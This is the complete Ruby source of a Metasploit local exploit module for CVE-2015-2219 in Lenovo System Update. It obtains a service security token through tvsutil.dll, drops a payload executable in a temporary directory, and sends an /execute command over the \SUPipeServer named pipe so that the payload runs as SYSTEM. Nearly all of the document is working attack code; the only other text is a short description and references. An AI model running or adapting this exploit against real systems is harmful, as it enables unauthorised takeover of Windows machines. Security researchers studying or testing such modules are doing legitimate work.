Lenovo System Update Privilege Escalation

`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class Metasploit3 < Msf::Exploit::Local  
include Msf::Exploit::EXE  
include Msf::Post::File  
include Msf::Exploit::FileDropper  
include Msf::Post::Windows::Priv  
include Msf::Post::Windows::Services  
  
Rank = ExcellentRanking  
  
def initialize(info={})  
super(update_info(info, {  
'Name' => 'Lenovo System Update Privilege Escalation',  
'Description' => %q{  
The named pipe, \SUPipeServer, can be accessed by normal users to interact with the  
System update service. The service provides the possibility to execute arbitrary  
commands as SYSTEM if a valid security token is provided. This token can be generated  
by calling the GetSystemInfoData function in the DLL tvsutil.dll. Please, note that the  
System Update is stopped by default but can be started/stopped calling the Executable  
ConfigService.exe.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Micahel Milvich', # vulnerability discovery, advisory  
'Sofiane Talmat', # vulnerability discovery, advisory  
'h0ng10' # Metasploit module  
],  
'Arch' => ARCH_X86,  
'Platform' => 'win',  
'SessionTypes' => ['meterpreter'],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
},  
'Targets' =>  
[  
[ 'Windows', { } ]  
],  
'Payload' =>  
{  
'Space' => 2048,  
'DisableNops' => true  
},  
'References' =>  
[  
['OSVDB', '121522'],  
['CVE', '2015-2219'],  
['URL', 'http://www.ioactive.com/pdfs/Lenovo_System_Update_Multiple_Privilege_Escalations.pdf']  
],  
'DisclosureDate' => 'Apr 12 2015',  
'DefaultTarget' => 0  
}))  
  
register_options([  
OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)']),  
OptInt.new('Sleep', [true, 'Time to sleep while service starts (seconds)', 4]),  
], self.class)  
  
end  
  
def check  
os = sysinfo['OS']  
  
unless os =~ /windows/i  
return Exploit::CheckCode::Safe  
end  
  
svc = service_info('SUService')  
if svc && svc[:display] =~ /System Update/  
vprint_good("Found service '#{svc[:display]}'")  
return Exploit::CheckCode::Appears  
else  
return Exploit::CheckCode::Safe  
end  
end  
  
  
def write_named_pipe(pipe, command)  
invalid_handle_value = 0xFFFFFFFF  
  
r = session.railgun.kernel32.CreateFileA(pipe, 'GENERIC_READ | GENERIC_WRITE', 0x3, nil, 'OPEN_EXISTING', 'FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL', 0)  
handle = r['return']  
  
if handle == invalid_handle_value  
fail_with(Failure::NoTarget, "#{pipe} named pipe not found")  
else  
vprint_good("Opended #{pipe}! Proceeding...")  
end  
  
begin  
  
# First, write the string length as Int32 value  
w = client.railgun.kernel32.WriteFile(handle, [command.length].pack('l'), 4, 4, nil)  
  
if w['return'] == false  
print_error('The was an error writing to pipe, check permissions')  
return false  
end  
  
# Then we send the real command  
w = client.railgun.kernel32.WriteFile(handle, command, command.length, 4, nil)  
  
if w['return'] == false  
print_error('The was an error writing to pipe, check permissions')  
return false  
end  
ensure  
session.railgun.kernel32.CloseHandle(handle)  
end  
true  
end  
  
  
def get_security_token(lenovo_directory)  
unless client.railgun.get_dll('tvsutil')  
client.railgun.add_dll('tvsutil', "#{lenovo_directory}\\tvsutil.dll")  
client.railgun.add_function('tvsutil', 'GetSystemInfoData', 'DWORD', [['PWCHAR', 'systeminfo', 'out']], windows_name = nil, calling_conv = 'cdecl')  
end  
  
dll_response = client.railgun.tvsutil.GetSystemInfoData(256)  
  
dll_response['systeminfo'][0,40]  
end  
  
  
def config_service(lenovo_directory, option)  
cmd_exec("#{lenovo_directory}\\ConfigService.exe #{option}")  
end  
  
  
def exploit  
if is_system?  
fail_with(Failure::NoTarget, 'Session is already elevated')  
end  
  
su_directory = service_info('SUService')[:path][1..-16]  
print_status('Starting service via ConfigService.exe')  
config_service(su_directory, 'start')  
  
print_status('Giving the service some time to start...')  
Rex.sleep(datastore['Sleep'])  
  
print_status("Getting security token...")  
token = get_security_token(su_directory)  
vprint_good("Security token is: #{token}")  
  
if datastore['WritableDir'].nil? || datastore['WritableDir'].empty?  
temp_dir = get_env('TEMP')  
else  
temp_dir = datastore['WritableDir']  
end  
  
print_status("Using #{temp_dir} to drop the payload")  
  
begin  
cd(temp_dir)  
rescue Rex::Post::Meterpreter::RequestError  
fail_with(Failure::BadConfig, "Failed to use the #{temp_dir} directory")  
end  
  
print_status('Writing malicious exe to remote filesystem')  
write_path = pwd  
exe_name = "#{rand_text_alpha(10 + rand(10))}.exe"  
  
begin  
write_file(exe_name, generate_payload_exe)  
register_file_for_cleanup("#{write_path}\\#{exe_name}")  
rescue Rex::Post::Meterpreter::RequestError  
fail_with(Failure::Unknown, "Failed to drop payload into #{temp_dir}")  
end  
  
print_status('Sending Execute command to update service')  
  
begin  
write_res = write_named_pipe("\\\\.\\pipe\\SUPipeServer", "/execute #{exe_name} /arguments /directory #{write_path} /type COMMAND /securitycode #{token}")  
rescue Rex::Post::Meterpreter::RequestError  
fail_with(Failure::Unknown, 'Failed to write to pipe')  
end  
  
unless write_res  
fail_with(Failure::Unknown, 'Failed to write to pipe')  
end  
  
print_status('Stopping service via ConfigService.exe')  
config_service(su_directory, 'stop')  
end  
  
end  
`